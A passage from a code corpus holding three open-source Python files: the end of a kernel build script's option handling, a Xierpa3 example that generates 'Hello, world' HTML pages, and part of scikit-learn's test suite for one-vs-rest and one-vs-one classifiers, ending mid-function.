"e.g. --updateconfigs=\'CONFIG_USE_THING=y\'")
parser.add_option('-j', '--jobs', type='int', dest="jobs",
help="Number of simultaneous jobs")
parser.add_option('-l', '--load-average', type='int',
dest='load_average',
help="Don't start multiple jobs unless load is below LOAD_AVERAGE")
parser.add_option('-k', '--keep-going', action='store_true',
dest='keep_going', default=False,
help="Keep building other targets if a target fails")
parser.add_option('-m', '--make-target', action='append',
help='Build the indicated make target (default: %s)' %
' '.join(make_command))
(options, args) = parser.parse_args()
global all_options
all_options = options
if options.list:
print "Available targets:"
for target in configs:
print " %s" % target.name
sys.exit(0)
if options.oldconfig:
make_command = ["oldconfig"]
elif options.make_target:
make_command = options.make_target
if args == ['all']:
build_many(configs)
elif args == ['perf']:
targets = []
for t in configs:
if "perf" in t.name:
targets.append(t)
build_many(targets)
elif args == ['noperf']:
targets = []
for t in configs:
if "perf" not in t.name:
targets.append(t)
build_many(targets)
elif len(args) > 0:
all_configs = {}
for t in configs:
all_configs[t.name] = t
targets = []
for t in args:
if t not in all_configs:
parser.error("Target '%s' not one of %s" % (t, all_configs.keys()))
targets.append(all_configs[t])
build_many(targets)
else:
parser.error("Must specify a target to build, or 'all'")
if __name__ == "__main__":
main()
| gpl-2.0 |
petrvanblokland/Xierpa3 | xierpa3/sites/examples/helloworldpages/make.py | 1 | 8420 | # -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# make.py
#
import webbrowser
from xierpa3.components import Theme, Page, Column
from xierpa3.builders.cssbuilder import CssBuilder
from xierpa3.builders.htmlbuilder import HtmlBuilder
from xierpa3.attributes import Em, Margin, Color, Perc
BODYFAMILY = 'Georgia, serif'
class BaseHelloWorldText(Column):
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Column.C
def buildBlock(self, b):
u"""Build a content base class. Inherited by specific HelloWorld... classes
that define the method **self.helloWorldText(b). In this example the CSS parameter
are still defined inside the block. Different from the real usage of BluePrint API parameter,
that allow modification from including components or inheriting components."""
b.div(class_=self.getClassName(), margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width='70%', maxwidth=700, minwidth=300, backgroundcolor='#222',
padding=Em(0.5), fontfamily=BODYFAMILY, fontsize=Em(4), textalign=self.C.CENTER,
lineheight=Em(1.4))
self._helloWorldText(b)
b._div()
b.div(class_=self.C.CLASS_CAPTION, color=Color('#888'),
margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width=Perc(70), maxwidth=700, minwidth=300,
paddingleft=Em(0.5), fontfamily=BODYFAMILY, fontsize=Em(0.8),
textalign=self.C.CENTER, lineheight=Em(1.4), fontstyle=self.C.ITALIC)
b.text('Intentionally non-responsive page example. Generated by Xierpa3.')
b._div()
class HelloWorldHome(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('yellow')) # Color name will be translate to more reliable hex code.
b.text('Hello, world!')
b._div()
# TODO: Needs to clean up. JSON example goes to separate example site.
def buildAjaxDict(self, site, d):
myD = d['HelloWorldHome'] = {}
myD['name'] = 'Petr'
myD['message'] = 'Hello'
myD['fontName'] = site.e.form['font'] or 'notdefined'
return d
class HelloWorldOther1(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('#00FF00')) # Show the text on this page in another color, to visualize the difference.
# TODO: Needs to clean up. JSON example goes to separate example site.
b.a(href='/ajax/font-MyFont')
b.text('Hello, world on another page using MyFont')
b._a()
b._div()
# TODO: Needs to clean up. JSON example goes to separate example site.
def buildAjaxDict(self, site, d):
myD = d['HelloWorldOther1'] = {}
myD['message'] = 'Hello ' * 10
return d
class HelloWorldOther2(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('#00FFFF')) # Show the text on this page in another color, to visualize the difference.
b.text('And yet another world on this page.')
b._div()
class Navigation(Column):
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Column.C
def buildBlock(self, b):
b.div(class_=self.getClassName(), margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width=Perc(40), maxwidth=700, minwidth=300, backgroundcolor=Color('#DDD'),
padding=Em(0.5), fontfamily=BODYFAMILY, textalign=self.C.CENTER)
# Still doing content and page identifiers directly, without adapter, in this example.
b.text(' | ')
for pageId in HelloWorldPages.PAGES:
# Making a reference to the page class is enough to build the url.
b.a(href='/'+pageId, fontsize=Em(1), color=Color('#444'))
b.text(pageId.capitalize()) # Make simple label in the menu from page id..
b._a()
b.text(' | ')
b._div()
class HelloWorldPages(Theme):
u"""The **HelloWorldLayout** class implements a basic "Hello, world!" page, running as
batch process, saving the result as an HTML file. Also it is available in the example webserver,
e.g. through the Xierpa3App."""
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Theme.C
TITLE = u'The layout version of "Hello, world!" page.' # Use as title of window.
TEMPLATE_OTHER1 = 'other'
TEMPLATE_OTHER2 = 'otherworld'
PAGES = (C.TEMPLATE_INDEX, TEMPLATE_OTHER1, TEMPLATE_OTHER2)
def baseComponents(self):
u"""Create a theme site with just one single template home page. Answer a list
of page instances that are used as templates for this site."""
# Create an instance (=object) of the text component to be placed on the page.
navigation = Navigation()
home = HelloWorldHome() # Example text component for the home page.
other1 = HelloWorldOther1() # Example text component for the other1Page
other2 = HelloWorldOther2() # Example text component for the other2Page
# Create an instance (=object) of the page, containing the "hw" component.
# The class is also the page name in the url. The navigation simply refers
# to the url by class nane.
homePage = Page(class_=self.C.TEMPLATE_INDEX, components=(navigation, home),
title=self.TITLE + '|' + self.C.TEMPLATE_INDEX)
other1Page = Page(class_=self.TEMPLATE_OTHER1, components=(navigation, other1),
title=self.TITLE + '|' + self.TEMPLATE_OTHER1)
other2Page = Page(class_=self.TEMPLATE_OTHER2, components=(navigation, other2),
title=self.TITLE + '|' + self.TEMPLATE_OTHER2)
# Answer a list of types of pages for this site.
return [homePage, other1Page, other2Page]
def make(self, root=None):
u"""The instance of this class builds CSS and HTML files at the optional path **root**.
If not defined, then the default ~/Desktop/Xierpa3Examples/[component.name] is used as export path,
as set by Builder.DEFAULT_ROOTPATH"""
# Create an "instance" (=object) of type "HelloWorldLayout". The type (=class) defines
# the behavior of the object that is made by calling the class.
# C S S
# Create the main CSS builder instance to build the SASS/CSS part of the site.
cssBuilder = CssBuilder()
# Compile (=build) the SCSS to CSS and save the file in "css/style.css".
self.build(cssBuilder) # Build from entire site theme, not just from template. Result is stream in builder.
cssBuilder.save(self, root)
# H T M L
# Create the main HTML builder instance to build the HTML part of the site.
htmlBuilder = HtmlBuilder()
# Compile the HTML and save the resulting HTML file in "helloWorld.html".
self.build(htmlBuilder) # Build from entire site theme, not just from template. Result is stream in builder.
# Answer the path, so we can directly open the file with a browser.
return htmlBuilder.save(self, root)
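# Usage sketch (illustrative): export to an explicit folder instead of the
# default ~/Desktop/Xierpa3Examples/... path used when root is omitted.
#
#   site = HelloWorldPages()
#   exportPath = site.make(root='/tmp/HelloWorldPages')  # hypothetical root
#   webbrowser.open(exportPath)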
if __name__ == '__main__':
# TODO: Why is the browser loading the CSS for every page?
# This construction "__name__ == '__main__'" makes this Python file only
# be executed when called in direct mode, such as "python make.py" in the terminal.
# Since no rootPath is added to make(), the file export is in ~/Desktop/Xierpa3Examples/HelloWorldLayout/
path = HelloWorldPages().make()
webbrowser.open(path)
| mit |
anntzer/scikit-learn | sklearn/tests/test_multiclass.py | 5 | 32749 | import numpy as np
import scipy.sparse as sp
import pytest
from re import escape
from sklearn.utils._testing import assert_array_equal
from sklearn.utils._testing import assert_almost_equal
from sklearn.utils._testing import ignore_warnings
from sklearn.utils._mocking import CheckingClassifier
from sklearn.multiclass import OneVsRestClassifier
from sklearn.multiclass import OneVsOneClassifier
from sklearn.multiclass import OutputCodeClassifier
from sklearn.utils.multiclass import (check_classification_targets,
type_of_target)
from sklearn.utils import (
check_array,
shuffle,
)
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.svm import LinearSVC, SVC
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import (LinearRegression, Lasso, ElasticNet, Ridge,
Perceptron, LogisticRegression,
SGDClassifier)
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.model_selection import GridSearchCV, cross_val_score
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.impute import SimpleImputer
from sklearn import svm
from sklearn.exceptions import NotFittedError
from sklearn import datasets
iris = datasets.load_iris()
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
n_classes = 3
def test_ovr_exceptions():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
# test predicting without fitting
with pytest.raises(NotFittedError):
ovr.predict([])
# Fail on multioutput data
msg = "Multioutput target data is not supported with label binarization"
with pytest.raises(ValueError, match=msg):
X = np.array([[1, 0], [0, 1]])
y = np.array([[1, 2], [3, 1]])
OneVsRestClassifier(MultinomialNB()).fit(X, y)
with pytest.raises(ValueError, match=msg):
X = np.array([[1, 0], [0, 1]])
y = np.array([[1.5, 2.4], [3.1, 0.8]])
OneVsRestClassifier(MultinomialNB()).fit(X, y)
def test_check_classification_targets():
    # Test that check_classification_targets raises on invalid targets. #5782
y = np.array([0.0, 1.1, 2.0, 3.0])
msg = type_of_target(y)
with pytest.raises(ValueError, match=msg):
check_classification_targets(y)
def test_ovr_fit_predict():
# A classifier which implements decision_function.
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes
clf = LinearSVC(random_state=0)
pred2 = clf.fit(iris.data, iris.target).predict(iris.data)
assert np.mean(iris.target == pred) == np.mean(iris.target == pred2)
# A classifier which implements predict_proba.
ovr = OneVsRestClassifier(MultinomialNB())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert np.mean(iris.target == pred) > 0.65
def test_ovr_partial_fit():
# Test if partial_fit is working as intended
X, y = shuffle(iris.data, iris.target, random_state=0)
ovr = OneVsRestClassifier(MultinomialNB())
ovr.partial_fit(X[:100], y[:100], np.unique(y))
ovr.partial_fit(X[100:], y[100:])
pred = ovr.predict(X)
ovr2 = OneVsRestClassifier(MultinomialNB())
pred2 = ovr2.fit(X, y).predict(X)
assert_almost_equal(pred, pred2)
assert len(ovr.estimators_) == len(np.unique(y))
assert np.mean(y == pred) > 0.65
    # Test when mini-batches don't have all classes
# with SGDClassifier
X = np.abs(np.random.randn(14, 2))
y = [1, 1, 1, 1, 2, 3, 3, 0, 0, 2, 3, 1, 2, 3]
ovr = OneVsRestClassifier(SGDClassifier(max_iter=1, tol=None,
shuffle=False, random_state=0))
ovr.partial_fit(X[:7], y[:7], np.unique(y))
ovr.partial_fit(X[7:], y[7:])
pred = ovr.predict(X)
ovr1 = OneVsRestClassifier(SGDClassifier(max_iter=1, tol=None,
shuffle=False, random_state=0))
pred1 = ovr1.fit(X, y).predict(X)
assert np.mean(pred == y) == np.mean(pred1 == y)
# test partial_fit only exists if estimator has it:
ovr = OneVsRestClassifier(SVC())
assert not hasattr(ovr, "partial_fit")
def test_ovr_partial_fit_exceptions():
ovr = OneVsRestClassifier(MultinomialNB())
X = np.abs(np.random.randn(14, 2))
y = [1, 1, 1, 1, 2, 3, 3, 0, 0, 2, 3, 1, 2, 3]
ovr.partial_fit(X[:7], y[:7], np.unique(y))
# If a new class that was not in the first call of partial fit is seen
# it should raise ValueError
y1 = [5] + y[7:-1]
msg = r"Mini-batch contains \[.+\] while classes must be subset of \[.+\]"
with pytest.raises(ValueError, match=msg):
ovr.partial_fit(X=X[7:], y=y1)
def test_ovr_ovo_regressor():
    # Test that ovr and ovo work on regressors which don't have
    # a decision_function
ovr = OneVsRestClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert np.mean(pred == iris.target) > .9
ovr = OneVsOneClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes * (n_classes - 1) / 2
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert np.mean(pred == iris.target) > .9
def test_ovr_fit_predict_sparse():
for sparse in [sp.csr_matrix, sp.csc_matrix, sp.coo_matrix, sp.dok_matrix,
sp.lil_matrix]:
base_clf = MultinomialNB(alpha=1)
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
clf_sprs = OneVsRestClassifier(base_clf).fit(X_train, sparse(Y_train))
Y_pred_sprs = clf_sprs.predict(X_test)
assert clf.multilabel_
assert sp.issparse(Y_pred_sprs)
assert_array_equal(Y_pred_sprs.toarray(), Y_pred)
# Test predict_proba
Y_proba = clf_sprs.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred_sprs.toarray())
# Test decision_function
clf = svm.SVC()
clf_sprs = OneVsRestClassifier(clf).fit(X_train, sparse(Y_train))
dec_pred = (clf_sprs.decision_function(X_test) > 0).astype(int)
assert_array_equal(dec_pred, clf_sprs.predict(X_test).toarray())
def test_ovr_always_present():
# Test that ovr works with classes that are always present or absent.
    # Note: this tests the case where _ConstantPredictor is utilised
X = np.ones((10, 2))
X[:5, :] = 0
# Build an indicator matrix where two features are always on.
    # As a list of label lists it would be:
    # [[1, 2] if i < 5 else [0, 1, 2] for i in range(10)]
y = np.zeros((10, 3))
y[5:, 0] = 1
y[:, 1] = 1
y[:, 2] = 1
ovr = OneVsRestClassifier(LogisticRegression())
msg = r'Label .+ is present in all training examples'
with pytest.warns(UserWarning, match=msg):
ovr.fit(X, y)
y_pred = ovr.predict(X)
assert_array_equal(np.array(y_pred), np.array(y))
y_pred = ovr.decision_function(X)
assert np.unique(y_pred[:, -2:]) == 1
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.ones(X.shape[0]))
# y has a constantly absent label
y = np.zeros((10, 2))
y[5:, 0] = 1 # variable label
ovr = OneVsRestClassifier(LogisticRegression())
msg = r'Label not 1 is present in all training examples'
with pytest.warns(UserWarning, match=msg):
ovr.fit(X, y)
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.zeros(X.shape[0]))
def test_ovr_multiclass():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "ham", "eggs", "ham"]
Y = np.array([[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[0, 0, 1],
[1, 0, 0]])
classes = set("ham eggs spam".split())
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet()):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert set(clf.classes_) == classes
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_array_equal(y_pred, ["eggs"])
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[0, 0, 4]])[0]
assert_array_equal(y_pred, [0, 0, 1])
def test_ovr_binary():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "spam", "eggs", "spam"]
Y = np.array([[0, 1, 1, 0, 1]]).T
classes = set("eggs spam".split())
def conduct_test(base_clf, test_predict_proba=False):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert set(clf.classes_) == classes
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_array_equal(y_pred, ["eggs"])
if hasattr(base_clf, 'decision_function'):
dec = clf.decision_function(X)
assert dec.shape == (5,)
if test_predict_proba:
X_test = np.array([[0, 0, 4]])
probabilities = clf.predict_proba(X_test)
assert 2 == len(probabilities[0])
assert (clf.classes_[np.argmax(probabilities, axis=1)] ==
clf.predict(X_test))
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[3, 0, 0]])[0]
assert y_pred == 1
for base_clf in (LinearSVC(random_state=0), LinearRegression(),
Ridge(), ElasticNet()):
conduct_test(base_clf)
for base_clf in (MultinomialNB(), SVC(probability=True),
LogisticRegression()):
conduct_test(base_clf, test_predict_proba=True)
def test_ovr_multilabel():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 4, 5], [0, 5, 0], [3, 3, 3], [4, 0, 6], [6, 0, 0]])
y = np.array([[0, 1, 1],
[0, 1, 0],
[1, 1, 1],
[1, 0, 1],
[1, 0, 0]])
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet(), Lasso(alpha=0.5)):
clf = OneVsRestClassifier(base_clf).fit(X, y)
y_pred = clf.predict([[0, 4, 4]])[0]
assert_array_equal(y_pred, [0, 1, 1])
assert clf.multilabel_
def test_ovr_fit_predict_svc():
ovr = OneVsRestClassifier(svm.SVC())
ovr.fit(iris.data, iris.target)
assert len(ovr.estimators_) == 3
assert ovr.score(iris.data, iris.target) > .9
def test_ovr_multilabel_dataset():
base_clf = MultinomialNB(alpha=1)
for au, prec, recall in zip((True, False), (0.51, 0.66), (0.51, 0.80)):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=2,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test, Y_test = X[80:], Y[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
assert clf.multilabel_
assert_almost_equal(precision_score(Y_test, Y_pred, average="micro"),
prec,
decimal=2)
assert_almost_equal(recall_score(Y_test, Y_pred, average="micro"),
recall,
decimal=2)
def test_ovr_multilabel_predict_proba():
base_clf = MultinomialNB(alpha=1)
for au in (False, True):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# Decision function only estimator.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
# Estimator with predict_proba disabled, depending on parameters.
decision_only = OneVsRestClassifier(svm.SVC(probability=False))
assert not hasattr(decision_only, 'predict_proba')
decision_only.fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
assert hasattr(decision_only, 'decision_function')
# Estimator which can get predict_proba enabled after fitting
gs = GridSearchCV(svm.SVC(probability=False),
param_grid={'probability': [True]})
proba_after_fit = OneVsRestClassifier(gs)
assert not hasattr(proba_after_fit, 'predict_proba')
proba_after_fit.fit(X_train, Y_train)
assert hasattr(proba_after_fit, 'predict_proba')
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred)
def test_ovr_single_label_predict_proba():
base_clf = MultinomialNB(alpha=1)
X, Y = iris.data, iris.target
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# Decision function only estimator.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
assert_almost_equal(Y_proba.sum(axis=1), 1.0)
    # predict assigns the label with the greatest predictive
    # probability.
pred = Y_proba.argmax(axis=1)
assert not (pred - Y_pred).any()
def test_ovr_multilabel_decision_function():
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal((clf.decision_function(X_test) > 0).astype(int),
clf.predict(X_test))
def test_ovr_single_label_decision_function():
X, Y = datasets.make_classification(n_samples=100,
n_features=20,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal(clf.decision_function(X_test).ravel() > 0,
clf.predict(X_test))
def test_ovr_gridsearch():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovr, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ovr_pipeline():
# Test with pipeline of length one
# This test is needed because the multiclass estimators may fail to detect
# the presence of predict_proba or decision_function.
clf = Pipeline([("tree", DecisionTreeClassifier())])
ovr_pipe = OneVsRestClassifier(clf)
ovr_pipe.fit(iris.data, iris.target)
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
assert_array_equal(ovr.predict(iris.data), ovr_pipe.predict(iris.data))
# TODO: Remove this test in version 1.1
# when the coef_ attribute is removed
@ignore_warnings(category=FutureWarning)
def test_ovr_coef_():
for base_classifier in [SVC(kernel='linear', random_state=0),
LinearSVC(random_state=0)]:
# SVC has sparse coef with sparse input data
ovr = OneVsRestClassifier(base_classifier)
for X in [iris.data, sp.csr_matrix(iris.data)]:
# test with dense and sparse coef
ovr.fit(X, iris.target)
shape = ovr.coef_.shape
assert shape[0] == n_classes
assert shape[1] == iris.data.shape[1]
# don't densify sparse coefficients
assert (sp.issparse(ovr.estimators_[0].coef_) ==
sp.issparse(ovr.coef_))
# TODO: Remove this test in version 1.1
# when the coef_ attribute is removed
@ignore_warnings(category=FutureWarning)
def test_ovr_coef_exceptions():
# Not fitted exception!
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ovr.coef_
# Doesn't have coef_ exception!
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
msg = "Base estimator doesn't have a coef_ attribute"
with pytest.raises(AttributeError, match=msg):
ovr.coef_
# TODO: Remove this test in version 1.1 when
# the coef_ and intercept_ attributes are removed
def test_ovr_deprecated_coef_intercept():
ovr = OneVsRestClassifier(SVC(kernel="linear"))
ovr = ovr.fit(iris.data, iris.target)
msg = (r"Attribute {0} was deprecated in version 0.24 "
r"and will be removed in 1.1 \(renaming of 0.26\). If you observe "
r"this warning while using RFE or SelectFromModel, "
r"use the importance_getter parameter instead.")
for att in ["coef_", "intercept_"]:
with pytest.warns(FutureWarning, match=msg.format(att)):
getattr(ovr, att)
def test_ovo_exceptions():
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ovo.predict([])
def test_ovo_fit_on_list():
# Test that OneVsOne fitting works with a list of targets and yields the
# same output as predict from an array
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
prediction_from_array = ovo.fit(iris.data, iris.target).predict(iris.data)
iris_data_list = [list(a) for a in iris.data]
prediction_from_list = ovo.fit(iris_data_list,
list(iris.target)).predict(iris_data_list)
assert_array_equal(prediction_from_array, prediction_from_list)
def test_ovo_fit_predict():
# A classifier which implements decision_function.
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
ovo.fit(iris.data, iris.target).predict(iris.data)
assert len(ovo.estimators_) == n_classes * (n_classes - 1) / 2
# A classifier which implements predict_proba.
ovo = OneVsOneClassifier(MultinomialNB())
ovo.fit(iris.data, iris.target).predict(iris.data)
assert len(ovo.estimators_) == n_classes * (n_classes - 1) / 2
def test_ovo_partial_fit_predict():
temp = datasets.load_iris()
X, y = temp.data, temp.target
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(X[:100], y[:100], np.unique(y))
ovo1.partial_fit(X[100:], y[100:])
pred1 = ovo1.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
ovo2.fit(X, y)
pred2 = ovo2.predict(X)
assert len(ovo1.estimators_) == n_classes * (n_classes - 1) / 2
assert np.mean(y == pred1) > 0.65
assert_almost_equal(pred1, pred2)
# Test when mini-batches have binary target classes
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(X[:60], y[:60], np.unique(y))
ovo1.partial_fit(X[60:], y[60:])
pred1 = ovo1.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
pred2 = ovo2.fit(X, y).predict(X)
assert_almost_equal(pred1, pred2)
assert len(ovo1.estimators_) == len(np.unique(y))
assert np.mean(y == pred1) > 0.65
ovo = OneVsOneClassifier(MultinomialNB())
X = np.random.rand(14, 2)
y = [1, 1, 2, 3, 3, 0, 0, 4, 4, 4, 4, 4, 2, 2]
ovo.partial_fit(X[:7], y[:7], [0, 1, 2, 3, 4])
ovo.partial_fit(X[7:], y[7:])
pred = ovo.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
pred2 = ovo2.fit(X, y).predict(X)
assert_almost_equal(pred, pred2)
# raises error when mini-batch does not have classes from all_classes
ovo = OneVsOneClassifier(MultinomialNB())
error_y = [0, 1, 2, 3, 4, 5, 2]
message_re = escape("Mini-batch contains {0} while "
"it must be subset of {1}".format(np.unique(error_y),
np.unique(y)))
with pytest.raises(ValueError, match=message_re):
ovo.partial_fit(X[:7], error_y, np.unique(y))
# test partial_fit only exists if estimator has it:
ovr = OneVsOneClassifier(SVC())
assert not hasattr(ovr, "partial_fit")
def test_ovo_decision_function():
n_samples = iris.data.shape[0]
ovo_clf = OneVsOneClassifier(LinearSVC(random_state=0))
# first binary
ovo_clf.fit(iris.data, iris.target == 0)
decisions = ovo_clf.decision_function(iris.data)
assert decisions.shape == (n_samples,)
# then multi-class
ovo_clf.fit(iris.data, iris.target)
decisions = ovo_clf.decision_function(iris.data)
assert decisions.shape == (n_samples, n_classes)
assert_array_equal(decisions.argmax(axis=1), ovo_clf.predict(iris.data))
# Compute the votes
votes = np.zeros((n_samples, n_classes))
k = 0
for i in range(n_classes):
for j in range(i + 1, n_classes):
pred = ovo_clf.estimators_[k].predict(iris.data)
votes[pred == 0, i] += 1
votes[pred == 1, j] += 1
k += 1
# Extract votes and verify
assert_array_equal(votes, np.round(decisions))
for class_idx in range(n_classes):
        # For each sample and each class, there are only 3 possible vote
        # levels because there are only 3 distinct class pairs and thus 3
        # distinct binary classifiers.
# Therefore, sorting predictions based on votes would yield
# mostly tied predictions:
assert set(votes[:, class_idx]).issubset(set([0., 1., 2.]))
# The OVO decision function on the other hand is able to resolve
# most of the ties on this data as it combines both the vote counts
# and the aggregated confidence levels of the binary classifiers
# to compute the aggregate decision function. The iris dataset
# has 150 samples with a couple of duplicates. The OvO decisions
# can resolve most of the ties:
assert len(np.unique(decisions[:, class_idx])) > 146
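# A hedged sketch of the aggregation the assertions above rely on (this
# mirrors the test's own decomposition: the decision values are integer
# pairwise vote counts plus a small confidence remainder that can break
# ties but never outweigh a whole vote):
#
#     votes = np.round(decisions)             # integer vote counts
#     confidences = decisions - votes         # tie-breaking remainder
#     prediction = (votes + confidences).argmax(axis=1)   # == predict(X)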
def test_ovo_gridsearch():
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovo, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ovo_ties():
# Test that ties are broken using the decision function,
# not defaulting to the smallest label
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y = np.array([2, 0, 1, 2])
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False, max_iter=4,
tol=None))
ovo_prediction = multi_clf.fit(X, y).predict(X)
ovo_decision = multi_clf.decision_function(X)
# Classifiers are in order 0-1, 0-2, 1-2
# Use decision_function to compute the votes and the normalized
# sum_of_confidences, which is used to disambiguate when there is a tie in
# votes.
votes = np.round(ovo_decision)
normalized_confidences = ovo_decision - votes
# For the first point, there is one vote per class
assert_array_equal(votes[0, :], 1)
# For the rest, there is no tie and the prediction is the argmax
assert_array_equal(np.argmax(votes[1:], axis=1), ovo_prediction[1:])
# For the tie, the prediction is the class with the highest score
assert ovo_prediction[0] == normalized_confidences[0].argmax()
def test_ovo_ties2():
    # Test that ties can be won by labels other than the first two
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y_ref = np.array([2, 0, 1, 2])
# cycle through labels so that each label wins once
for i in range(3):
y = (y_ref + i) % 3
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False, max_iter=4,
tol=None))
ovo_prediction = multi_clf.fit(X, y).predict(X)
assert ovo_prediction[0] == i % 3
def test_ovo_string_y():
# Test that the OvO doesn't mess up the encoding of string labels
X = np.eye(4)
y = np.array(['a', 'b', 'c', 'd'])
ovo = OneVsOneClassifier(LinearSVC())
ovo.fit(X, y)
assert_array_equal(y, ovo.predict(X))
def test_ovo_one_class():
# Test error for OvO with one class
